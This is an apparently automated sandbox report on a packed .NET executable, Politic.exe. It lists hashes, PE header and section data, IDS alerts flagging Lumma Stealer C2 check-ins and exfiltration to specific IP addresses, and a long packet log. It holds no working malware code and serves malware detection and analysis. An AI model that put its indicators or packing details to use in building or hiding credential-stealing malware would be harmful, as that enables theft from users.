                                          SHA256:6ac6fce5dddcd7e72952ba3c2e36e92c5c4aac45e2b5226060421193e882d996
                                          SHA512:08d52e98bd95230f6478396dc3a1e43cd77e8284a3f6c703900ee02a0f8433b2e83159b3cb3b1dfccc951727c9e58b651be4ad3b888f0bd7ec24cbf80a31565f
                                          SSDEEP:12288:z/8Xg+W5MHFU2Ahl3kk1M/vHixeG0XG9otBlyR0u:zgTlU2Ar4/Pi4K9oteD
                                          TLSH:729412497BC8AB72C9A056B5C0F3596582F0E1871977F3C53F441E945F827988E743CA
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................`................................
                                          Icon Hash:90cececece8e8eb0
                                          Entrypoint:0x40e50e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0xAFA985D8 [Wed May 23 05:10:48 2063 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe4c0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10000 | 0x598 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe478 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc514 | 0xc600 | c8e98fba2c864102aff8d83a8ccc0220 | False | 0.5807686237373737 | data | 6.1883466777474085 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x10000 | 0x598 | 0x600 | 45944832ca66f37df2a22d1e745bbda0 | False | 0.4114583333333333 | data | 4.028483779114603 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12000 | 0xc | 0x200 | f9bf38b490c2b4dad223aadf230001d0 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.CSS | 0x14000 | 0x5ae00 | 0x5ae00 | 243d65d1b33ccd8e4f34c8020ba184e2 | False | 1.0003250730742779 | data | 7.999532940349531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x100a0 | 0x30c | data | | | 0.4230769230769231
RT_MANIFEST | 0x103ac | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
Comments |
CompanyName |
FileDescription | Politic
FileVersion | 1.0.0.0
InternalName | Politic.exe
LegalCopyright | Copyright 2025
LegalTrademarks |
OriginalFilename | Politic.exe
ProductName | Politic
ProductVersion | 1.0.0.0
Assembly Version | 1.0.0.0
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-05T14:57:19.214933+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49704 | 149.154.167.99 | 443 | TCP
2025-03-05T14:57:20.010753+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:22.449792+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:22.449792+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:22.954670+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49712 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:23.516026+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49712 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:24.255162+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49713 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:25.813429+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49714 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:27.573571+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49714 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:28.170505+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49715 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:32.599119+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49719 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:33.820271+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49722 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:37.205618+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49728 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:39.257381+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49728 | 188.114.97.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 5, 2025 14:57:18.563942909 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:18.563988924 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:18.564058065 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:18.565562010 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:18.565581083 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.214802980 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.214932919 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:19.228290081 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:19.228339911 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.229338884 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.272516012 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:19.286473036 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:19.328324080 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.477807999 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.477871895 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.477891922 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.477927923 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.477935076 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:19.477965117 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.477987051 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:19.478005886 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:19.478012085 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.478070021 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.478117943 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:19.481570959 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:19.481585026 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.481600046 CET | 49704 | 443 | 192.168.2.5 | 149.154.167.99
Mar 5, 2025 14:57:19.481605053 CET | 443 | 49704 | 149.154.167.99 | 192.168.2.5
Mar 5, 2025 14:57:19.506010056 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:19.506037951 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:19.506108999 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:19.506738901 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:19.506756067 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:20.010682106 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:20.010752916 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:20.013755083 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:20.013780117 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:20.014193058 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:20.015610933 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:20.015642881 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:20.015708923 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:22.449803114 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:22.449913979 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:22.450006962 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:22.451493025 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:22.451514006 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:22.455863953 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:22.455902100 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:22.455985069 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:22.456237078 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:22.456250906 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:22.954559088 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:22.954669952 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:22.958930016 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:22.958945036 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:22.959338903 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:22.967647076 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:22.967668056 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:22.967802048 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.516031027 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.516092062 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.516128063 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.516155005 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.516166925 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.516191006 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.516205072 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.516235113 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.516272068 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.516277075 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.516717911 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.516772032 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.516777992 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.516925097 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.516966105 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.516971111 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.520904064 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.520983934 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.520998955 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.562716961 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.609860897 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.609936953 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.609982967 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.610008001 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.655637026 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.655719042 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.659914017 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.659945011 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.659960032 CET | 49712 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.659965992 CET | 443 | 49712 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.771279097 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.771308899 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:23.771389008 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.771667957 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:23.771682978 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:24.255076885 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:24.255162001 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:24.256474018 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:24.256483078 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:24.256877899 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:24.261987925 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:24.262136936 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:24.262177944 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:25.303967953 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:25.304080009 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:25.304296017 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:25.304460049 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:25.321156979 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:25.321182966 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:25.321294069 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:25.321583033 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:25.321595907 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:25.813327074 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:25.813429117 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:25.814970970 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:25.814985037 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:25.815385103 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:25.816653013 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:25.816803932 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:25.816840887 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:25.816920042 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:25.860325098 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:27.573621035 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:27.573842049 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:27.573929071 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:27.573992014 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:27.574026108 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:27.659578085 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:27.659601927 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:27.660329103 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:27.668332100 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:27.668349981 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:28.170207977 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:28.170505047 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:28.171710014 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:28.171720982 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:28.172205925 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:28.173590899 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:28.173590899 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:28.173636913 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:28.173721075 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:28.173729897 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:31.902564049 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:31.902661085 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:31.902719021 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:31.909698963 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:31.909718990 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:32.120346069 CET | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:32.120364904 CET | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:32.120676041 CET | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:32.121279001 CET | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:32.121289015 CET | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:32.598936081 CET | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:32.599118948 CET | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:32.600326061 CET | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:32.600342035 CET | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:32.600651026 CET | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:32.602375984 CET | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:32.602461100 CET | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:32.602488041 CET | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.039304018 CET | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.039393902 CET | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.039489985 CET | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.039612055 CET | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.039638042 CET | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.348548889 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.348608017 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.348687887 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.348998070 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.349013090 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.820168018 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.820271015 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.821466923 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.821480989 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.821712971 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.822783947 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.823493958 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.823527098 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.823633909 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.823668957 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.823772907 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.823798895 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.823915958 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.823951006 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.824074984 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.824105978 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.824250937 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.824276924 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.824287891 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.824301958 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.824430943 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.824455023 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.824476957 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
